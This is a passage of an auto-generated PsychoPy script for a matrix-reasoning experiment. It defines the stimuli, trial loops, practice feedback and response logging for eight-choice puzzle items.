font=u'Arial',
pos=(130, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-9.0);
Opt4 = visual.TextStim(win=win, name='Opt4',
text=u'4',
font=u'Arial',
pos=(280, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-10.0);
Opt5 = visual.TextStim(win=win, name='Opt5',
text=u'5',
font=u'Arial',
pos=(-170, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-11.0);
CFig7 = visual.ImageStim(
win=win, name='CFig7',
image='sin', mask=None,
ori=0, pos=(75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-13.0)
CFig8 = visual.ImageStim(
win=win, name='CFig8',
image='sin', mask=None,
ori=0, pos=(225, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-14.0)
Opt6 = visual.TextStim(win=win, name='Opt6',
text=u'6',
font=u'Arial',
pos=(-20, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-15.0);
Opt7 = visual.TextStim(win=win, name='Opt7',
text=u'7',
font=u'Arial',
pos=(130, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-16.0);
Opt8 = visual.TextStim(win=win, name='Opt8',
text=u'8',
font=u'Arial',
pos=(280, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-17.0);
# Initialize components for Routine "Feedback2"
Feedback2Clock = core.Clock()
Prac2Feedback = visual.TextStim(win=win, name='Prac2Feedback',
text=u'Here the correct answer is 6. \n\nThis is because if you subtract the elements in column 2 from column 1 you get column 3. The same is true if you subtract the elements from row 2 from the elements of row 1, you get row 3.\nPress any key to continue.',
font=u'Arial',
pos=(350, -140), height=30, wrapWidth=600, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=0.0);
Prac2Fold = visual.ImageStim(
win=win, name='Prac2Fold',
image='sin', mask=None,
ori=0, pos=(0, 200), size=(430, 380),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
Prac2Choice = visual.ImageStim(
win=win, name='Prac2Choice',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "GetReady"
GetReadyClock = core.Clock()
GetReady2 = visual.TextStim(win=win, name='GetReady2',
text='Get ready to perform the task with no feedback.\nPlease try to respond as quickly and accurately as possible.\n\nPress any key to begin.',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 200), size=1.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
CFig1 = visual.ImageStim(
win=win, name='CFig1',
image='sin', mask=None,
ori=0, pos=(-225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
CFig2 = visual.ImageStim(
win=win, name='CFig2',
image='sin', mask=None,
ori=0, pos=(-75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
CFig3 = visual.ImageStim(
win=win, name='CFig3',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-3.0)
CFig4 = visual.ImageStim(
win=win, name='CFig4',
image='sin', mask=None,
ori=0, pos=(225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-4.0)
CFig5 = visual.ImageStim(
win=win, name='CFig5',
image='sin', mask=None,
ori=0, pos=(-225, -225), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-5.0)
CFIg6 = visual.ImageStim(
win=win, name='CFIg6',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-6.0)
Opt1 = visual.TextStim(win=win, name='Opt1',
text=u'1',
font=u'Arial',
pos=(-170, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-7.0);
Opt2 = visual.TextStim(win=win, name='Opt2',
text=u'2',
font=u'Arial',
pos=(-20, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-8.0);
Opt3 = visual.TextStim(win=win, name='Opt3',
text=u'3',
font=u'Arial',
pos=(130, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-9.0);
Opt4 = visual.TextStim(win=win, name='Opt4',
text=u'4',
font=u'Arial',
pos=(280, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-10.0);
Opt5 = visual.TextStim(win=win, name='Opt5',
text=u'5',
font=u'Arial',
pos=(-170, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-11.0);
CFig7 = visual.ImageStim(
win=win, name='CFig7',
image='sin', mask=None,
ori=0, pos=(75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-13.0)
CFig8 = visual.ImageStim(
win=win, name='CFig8',
image='sin', mask=None,
ori=0, pos=(225, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-14.0)
Opt6 = visual.TextStim(win=win, name='Opt6',
text=u'6',
font=u'Arial',
pos=(-20, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-15.0);
Opt7 = visual.TextStim(win=win, name='Opt7',
text=u'7',
font=u'Arial',
pos=(130, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-16.0);
Opt8 = visual.TextStim(win=win, name='Opt8',
text=u'8',
font=u'Arial',
pos=(280, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-17.0);
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "ThankYou"
ThankYouClock = core.Clock()
text_2 = visual.TextStim(win=win, name='text_2',
text='Thank You',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# ------Prepare to start Routine "Instructions"-------
t = 0
InstructionsClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
StartPractice = event.BuilderKeyResponse()
# keep track of which components have finished
InstructionsComponents = [Instruct, StartPractice]
for thisComponent in InstructionsComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "Instructions"-------
while continueRoutine:
# get current time
t = InstructionsClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *Instruct* updates
if t >= 0.0 and Instruct.status == NOT_STARTED:
# keep track of start time/frame for later
Instruct.tStart = t
Instruct.frameNStart = frameN # exact frame index
Instruct.setAutoDraw(True)
# *StartPractice* updates
if t >= 0.0 and StartPractice.status == NOT_STARTED:
# keep track of start time/frame for later
StartPractice.tStart = t
StartPractice.frameNStart = frameN # exact frame index
StartPractice.status = STARTED
# keyboard checking is just starting
win.callOnFlip(StartPractice.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if StartPractice.status == STARTED:
theseKeys = event.getKeys()
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
StartPractice.keys = theseKeys[-1] # just the last key pressed
StartPractice.rt = StartPractice.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in InstructionsComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "Instructions"-------
for thisComponent in InstructionsComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if StartPractice.keys in ['', [], None]: # No response was made
StartPractice.keys=None
thisExp.addData('StartPractice.keys',StartPractice.keys)
if StartPractice.keys != None: # we had a response
thisExp.addData('StartPractice.rt', StartPractice.rt)
thisExp.nextEntry()
# the Routine "Instructions" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
trials = data.TrialHandler(nReps=1, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('Matrices.csv', selection='[0]'),
seed=None, name='trials')
thisExp.addLoop(trials) # add the loop to the experiment
thisTrial = trials.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial.keys():
exec(paramName + '= thisTrial.' + paramName)
for thisTrial in trials:
currentLoop = trials
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial.keys():
exec(paramName + '= thisTrial.' + paramName)
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
image.setImage(Stimulus)
image.setSize((430,380))
CFig1.setImage(Choice1)
CFig2.setImage(Choice2)
CFig3.setImage(Choice3)
CFig4.setImage(Choice4)
CFIg6.setImage(Choice6)
key_resp_2 = event.BuilderKeyResponse()
CFig7.setImage(Choice7)
CFig8.setImage(Choice8)
# keep track of which components have finished
trialComponents = [image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6, Opt1, Opt2, Opt3, Opt4, Opt5, key_resp_2, CFig7, CFig8, Opt6, Opt7, Opt8]
for thisComponent in trialComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
# get current time
t = trialClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *image* updates
if t >= 0.0 and image.status == NOT_STARTED:
# keep track of start time/frame for later
image.tStart = t
image.frameNStart = frameN # exact frame index
image.setAutoDraw(True)
# *CFig1* updates
if t >= 0.0 and CFig1.status == NOT_STARTED:
# keep track of start time/frame for later
CFig1.tStart = t
CFig1.frameNStart = frameN # exact frame index
CFig1.setAutoDraw(True)
# *CFig2* updates
if t >= 0.0 and CFig2.status == NOT_STARTED:
# keep track of start time/frame for later
CFig2.tStart = t
CFig2.frameNStart = frameN # exact frame index
CFig2.setAutoDraw(True)
# *CFig3* updates
if t >= 0.0 and CFig3.status == NOT_STARTED:
# keep track of start time/frame for later
CFig3.tStart = t
CFig3.frameNStart = frameN # exact frame index
CFig3.setAutoDraw(True)
# *CFig4* updates
if t >= 0.0 and CFig4.status == NOT_STARTED:
# keep track of start time/frame for later
CFig4.tStart = t
CFig4.frameNStart = frameN # exact frame index
CFig4.setAutoDraw(True)
# *CFig5* updates
if t >= 0.0 and CFig5.status == NOT_STARTED:
# keep track of start time/frame for later
CFig5.tStart = t
CFig5.frameNStart = frameN # exact frame index
CFig5.setAutoDraw(True)
if CFig5.status == STARTED: # only update if drawing
CFig5.setImage(Choice5, log=False)
# *CFIg6* updates
if t >= 0.0 and CFIg6.status == NOT_STARTED:
# keep track of start time/frame for later
CFIg6.tStart = t
CFIg6.frameNStart = frameN # exact frame index
CFIg6.setAutoDraw(True)
# *Opt1* updates
if t >= 0.0 and Opt1.status == NOT_STARTED:
# keep track of start time/frame for later
Opt1.tStart = t
Opt1.frameNStart = frameN # exact frame index
Opt1.setAutoDraw(True)
# *Opt2* updates
if t >= 0.0 and Opt2.status == NOT_STARTED:
# keep track of start time/frame for later
Opt2.tStart = t
Opt2.frameNStart = frameN # exact frame index
Opt2.setAutoDraw(True)
# *Opt3* updates
if t >= 0.0 and Opt3.status == NOT_STARTED:
# keep track of start time/frame for later
Opt3.tStart = t
Opt3.frameNStart = frameN # exact frame index
Opt3.setAutoDraw(True)
# *Opt4* updates
if t >= 0.0 and Opt4.status == NOT_STARTED:
# keep track of start time/frame for later
Opt4.tStart = t
Opt4.frameNStart = frameN # exact frame index
Opt4.setAutoDraw(True)
# *Opt5* updates
if t >= 0.0 and Opt5.status == NOT_STARTED:
# keep track of start time/frame for later
Opt5.tStart = t
Opt5.frameNStart = frameN # exact frame index
Opt5.setAutoDraw(True)
# *key_resp_2* updates
if t >= 0.0 and key_resp_2.status == NOT_STARTED:
# keep track of start time/frame for later
key_resp_2.tStart = t
key_resp_2.frameNStart = frameN # exact frame index
key_resp_2.status = STARTED
# keyboard checking is just starting
win.callOnFlip(key_resp_2.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if key_resp_2.status == STARTED:
theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
key_resp_2.keys = theseKeys[-1] # just the last key pressed
key_resp_2.rt = key_resp_2.clock.getTime()
# was this 'correct'?
if (key_resp_2.keys == str(Corr)) or (key_resp_2.keys == Corr):
key_resp_2.corr = 1
else:
key_resp_2.corr = 0
# a response ends the routine
continueRoutine = False
# *CFig7* updates
if t >= 0.0 and CFig7.status == NOT_STARTED:
# keep track of start time/frame for later
CFig7.tStart = t
CFig7.frameNStart = frameN # exact frame index
CFig7.setAutoDraw(True)
# *CFig8* updates
if t >= 0.0 and CFig8.status == NOT_STARTED:
# keep track of start time/frame for later
CFig8.tStart = t
CFig8.frameNStart = frameN # exact frame index
CFig8.setAutoDraw(True)
# *Opt6* updates
if t >= 0.0 and Opt6.status == NOT_STARTED:
# keep track of start time/frame for later
Opt6.tStart = t
Opt6.frameNStart = frameN # exact frame index
Opt6.setAutoDraw(True)
# *Opt7* updates
if t >= 0.0 and Opt7.status == NOT_STARTED:
# keep track of start time/frame for later
Opt7.tStart = t
Opt7.frameNStart = frameN # exact frame index
Opt7.setAutoDraw(True)
# *Opt8* updates
if t >= 0.0 and Opt8.status == NOT_STARTED:
# keep track of start time/frame for later
Opt8.tStart = t
Opt8.frameNStart = frameN # exact frame index
Opt8.setAutoDraw(True)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in trialComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if key_resp_2.keys in ['', [], None]: # No response was made
key_resp_2.keys=None
# was no response the correct answer?!
if str(Corr).lower() == 'none':
key_resp_2.corr = 1 # correct non-response
else:
key_resp_2.corr = 0 # failed to respond (incorrectly)
# store data for trials (TrialHandler)
trials.addData('key_resp_2.keys',key_resp_2.keys)
trials.addData('key_resp_2.corr', key_resp_2.corr)
if key_resp_2.keys != None: # we had a response
trials.addData('key_resp_2.rt', key_resp_2.rt)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "Feedback1"-------
t = 0
Feedback1Clock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
Prac1Matrix.setImage(Stimulus)
Prac1Choice.setImage(Choice3)
Prac1End = event.BuilderKeyResponse()
# keep track of which components have finished
Feedback1Components = [Prac1Feedback, Prac1Matrix, Prac1Choice, Prac1End]
for thisComponent in Feedback1Components:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "Feedback1"-------
while continueRoutine:
# get current time
t = Feedback1Clock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *Prac1Feedback* updates
if t >= 0.0 and Prac1Feedback.status == NOT_STARTED:
# keep track of start time/frame for later
Prac1Feedback.tStart = t
Prac1Feedback.frameNStart = frameN # exact frame index
Prac1Feedback.setAutoDraw(True)
# *Prac1Matrix* updates
if t >= 0.0 and Prac1Matrix.status == NOT_STARTED:
# keep track of start time/frame for later
Prac1Matrix.tStart = t
Prac1Matrix.frameNStart = frameN # exact frame index
Prac1Matrix.setAutoDraw(True)
# *Prac1Choice* updates
if t >= 0.0 and Prac1Choice.status == NOT_STARTED:
# keep track of start time/frame for later
Prac1Choice.tStart = t
Prac1Choice.frameNStart = frameN # exact frame index
Prac1Choice.setAutoDraw(True)
# *Prac1End* updates
if t >= 0.0 and Prac1End.status == NOT_STARTED:
# keep track of start time/frame for later
Prac1End.tStart = t
Prac1End.frameNStart = frameN # exact frame index
Prac1End.status = STARTED
# keyboard checking is just starting
win.callOnFlip(Prac1End.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if Prac1End.status == STARTED:
theseKeys = event.getKeys()
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
Prac1End.keys = theseKeys[-1] # just the last key pressed
Prac1End.rt = Prac1End.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in Feedback1Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "Feedback1"-------
for thisComponent in Feedback1Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if Prac1End.keys in ['', [], None]: # No response was made
Prac1End.keys=None
trials.addData('Prac1End.keys',Prac1End.keys)
if Prac1End.keys != None: # we had a response
trials.addData('Prac1End.rt', Prac1End.rt)
# the Routine "Feedback1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)
# update component parameters for each repeat
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = crosshairClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text* updates
if t >= 0.0 and text.status == NOT_STARTED:
# keep track of start time/frame for later
text.tStart = t
text.frameNStart = frameN # exact frame index
text.setAutoDraw(True)
frameRemains = 0.0 + 0.5- win.monitorFramePeriod * 0.75 # most of one frame period left
if text.status == STARTED and t >= frameRemains:
text.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.nextEntry()
# completed 1 repeats of 'trials'
# set up handler to look after randomisation of conditions etc
trials_3 = data.TrialHandler(nReps=1, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('Matrices.csv', selection='[1]'),
seed=None, name='trials_3')
thisExp.addLoop(trials_3) # add the loop to the experiment
thisTrial_3 = trials_3.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial_3.rgb)
if thisTrial_3 != None:
for paramName in thisTrial_3.keys():
exec(paramName + '= thisTrial_3.' + paramName)
for thisTrial_3 in trials_3:
currentLoop = trials_3
# abbreviate parameter names if possible (e.g. rgb = thisTrial_3.rgb)
if thisTrial_3 != None:
for paramName in thisTrial_3.keys():
exec(paramName + '= thisTrial_3.' + paramName)
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
image.setImage(Stimulus)
image.setSize((430,380))
CFig1.setImage(Choice1)
CFig2.setImage(Choice2)
CFig3.setImage(Choice3)
CFig4.setImage(Choice4)
CFIg6.setImage(Choice6)
key_resp_2 = event.BuilderKeyResponse()
CFig7.setImage(Choice7)
CFig8.setImage(Choice8)
# keep track of which components have finished
trialComponents = [image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6, Opt1, Opt2, Opt3, Opt4, Opt5, key_resp_2, CFig7, CFig8, Opt6, Opt7, Opt8]
for thisComponent in trialComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
# get current time
t = trialClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *image* updates
if t >= 0.0 and image.status == NOT_STARTED:
# keep track of start time/frame for later
image.tStart = t
image.frameNStart = frameN # exact frame index
image.setAutoDraw(True)
# *CFig1* updates
if t >= 0.0 and CFig1.status == NOT_STARTED:
# keep track of start time/frame for later
CFig1.tStart = t
CFig1.frameNStart = frameN # exact frame index
CFig1.setAutoDraw(True)
# *CFig2* updates
if t >= 0.0 and CFig2.status == NOT_STARTED:
# keep track of start time/frame for later
CFig2.tStart = t
CFig2.frameNStart = frameN # exact frame index
CFig2.setAutoDraw(True)
# *CFig3* updates
if t >= 0.0 and CFig3.status == NOT_STARTED:
# keep track of start time/frame for later
CFig3.tStart = t
CFig3.frameNStart = frameN # exact frame index
CFig3.setAutoDraw(True)
# *CFig4* updates
if t >= 0.0 and CFig4.status == NOT_STARTED:
# keep track of start time/frame for later
CFig4.tStart = t
CFig4.frameNStart = frameN # exact frame index
CFig4.setAutoDraw(True)
# *CFig5* updates
if t >= 0.0 and CFig5.status == NOT_STARTED:
# keep track of start time/frame for later
CFig5.tStart = t
CFig5.frameNStart = frameN # exact frame index
CFig5.setAutoDraw(True)
if CFig5.status == STARTED: # only update if drawing
CFig5.setImage(Choice5, log=False)
# *CFIg6* updates
if t >= 0.0 and CFIg6.status == NOT_STARTED:
# keep track of start time/frame for later
CFIg6.tStart = t
CFIg6.frameNStart = frameN # exact frame index
CFIg6.setAutoDraw(True)
# *Opt1* updates
if t >= 0.0 and Opt1.status == NOT_STARTED:
# keep track of start time/frame for later
Opt1.tStart = t
Opt1.frameNStart = frameN # exact frame index
Opt1.setAutoDraw(True)
# *Opt2* updates
if t >= 0.0 and Opt2.status == NOT_STARTED:
# keep track of start time/frame for later
Opt2.tStart = t
Opt2.frameNStart = frameN # exact frame index
Opt2.setAutoDraw(True)
# *Opt3* updates
if t >= 0.0 and Opt3.status == NOT_STARTED:
# keep track of start time/frame for later
Opt3.tStart = t
Opt3.frameNStart = frameN # exact frame index
Opt3.setAutoDraw(True)
# *Opt4* updates
if t >= 0.0 and Opt4.status == NOT_STARTED:
# keep track of start time/frame for later
Opt4.tStart = t
Opt4.frameNStart = frameN # exact frame index
Opt4.setAutoDraw(True)
# *Opt5* updates
if t >= 0.0 and Opt5.status == NOT_STARTED:
# keep track of start time/frame for later
Opt5.tStart = t
Opt5.frameNStart = frameN # exact frame index
Opt5.setAutoDraw(True)
# *key_resp_2* updates
if t >= 0.0 and key_resp_2.status == NOT_STARTED:
# keep track of start time/frame for later
key_resp_2.tStart = t
key_resp_2.frameNStart = frameN # exact frame index
key_resp_2.status = STARTED
# keyboard checking is just starting
win.callOnFlip(key_resp_2.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if key_resp_2.status == STARTED:
theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
key_resp_2.keys = theseKeys[-1] # just the last key pressed
key_resp_2.rt = key_resp_2.clock.getTime()
# was this 'correct'?
if (key_resp_2.keys == str(Corr)) or (key_resp_2.keys == Corr):
key_resp_2.corr = 1
else:
key_resp_2.corr = 0
# a response ends the routine
continueRoutine = False
# *CFig7* updates
if t >= 0.0 and CFig7.status == NOT_STARTED:
# keep track of start time/frame for later
CFig7.tStart = t
CFig7.frameNStart = frameN # exact frame index
CFig7.setAutoDraw(True)
# *CFig8* updates
if t >= 0.0 and CFig8.status == NOT_STARTED:
# keep track of start time/frame for later
CFig8.tStart = t
CFig8.frameNStart = frameN # exact frame index
CFig8.setAutoDraw(True)
# *Opt6* updates
if t >= 0.0 and Opt6.status == NOT_STARTED:
# keep track of start time/frame for later
Opt6.tStart = t
Opt6.frameNStart = frameN # exact frame index
Opt6.setAutoDraw(True)
# *Opt7* updates
if t >= 0.0 and Opt7.status == NOT_STARTED:
# keep track of start time/frame for later
Opt7.tStart = t
Opt7.frameNStart = frameN # exact frame index
Opt7.setAutoDraw(True)
# *Opt8* updates
if t >= 0.0 and Opt8.status == NOT_STARTED:
# keep track of start time/frame for later
Opt8.tStart = t
Opt8.frameNStart = frameN # exact frame index
Opt8.setAutoDraw(True)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in trialComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if key_resp_2.keys in ['', [], None]: # No response was made
key_resp_2.keys=None
# was no response the correct answer?!
if str(Corr).lower() == 'none':
key_resp_2.corr = 1 # correct non-response
else:
key_resp_2.corr = 0 # failed to respond (incorrectly)
# store data for trials_3 (TrialHandler)
trials_3.addData('key_resp_2.keys',key_resp_2.keys)
trials_3.addData('key_resp_2.corr', key_resp_2.corr)
if key_resp_2.keys != None: # we had a response
trials_3.addData('key_resp_2.rt', key_resp_2.rt)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "Feedback2"-------
t = 0
Feedback2Clock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
Prac2Fold.setImage(Stimulus)
Prac2Choice.setImage(Choice6)
Prac2End = event.BuilderKeyResponse()
# keep track of which components have finished
Feedback2Components = [Prac2Feedback, Prac2Fold, Prac2Choice, Prac2End]
for thisComponent in Feedback2Components:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "Feedback2"-------
while continueRoutine:
# get current time
t = Feedback2Clock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *Prac2Feedback* updates
if t >= 0.0 and Prac2Feedback.status == NOT_STARTED:
# keep track of start time/frame for later
Prac2Feedback.tStart = t
Prac2Feedback.frameNStart = frameN # exact frame index
Prac2Feedback.setAutoDraw(True)
# *Prac2Fold* updates
if t >= 0.0 and Prac2Fold.status == NOT_STARTED:
# keep track of start time/frame for later
Prac2Fold.tStart = t
Prac2Fold.frameNStart = frameN # exact frame index
Prac2Fold.setAutoDraw(True)
# *Prac2Choice* updates
if t >= 0.0 and Prac2Choice.status == NOT_STARTED:
# keep track of start time/frame for later
Prac2Choice.tStart = t
Prac2Choice.frameNStart = frameN # exact frame index
Prac2Choice.setAutoDraw(True)
# *Prac2End* updates
